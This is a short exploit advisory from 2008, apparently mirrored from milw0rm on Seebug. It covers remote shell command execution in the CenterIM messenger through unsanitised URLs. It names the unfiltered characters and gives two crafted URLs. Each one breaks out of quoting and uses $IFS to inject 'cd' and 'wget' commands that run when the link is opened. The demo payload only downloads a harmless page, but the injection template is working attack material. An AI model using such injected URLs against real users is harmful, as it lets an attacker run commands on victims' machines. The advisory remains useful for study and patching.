####################################################################### Application: CenterIM http://www.centerim.org/index.php/Main_Page Versions: centerim <= 4.22.3 OS: Linux Bug: Execution of shell commands Exploit: remote Date: 15 March 2008 Author: Brian Fonfara (w00) eMail: brian.fonfara@gmx.de Web: newb.kicks-ass.net ####################################################################### 1) Bug 2) Exploit ####################################################################### ======= 1) Bug ======= Received URLs in the message window do not get checked for illegal characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||" ####################################################################### =========== 2) Exploit =========== Standard settings: - Browser already open: http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'( - New browser instance: http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de" ####################################################################### Greets to: mrks # milw0rm.com [2008-03-20]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论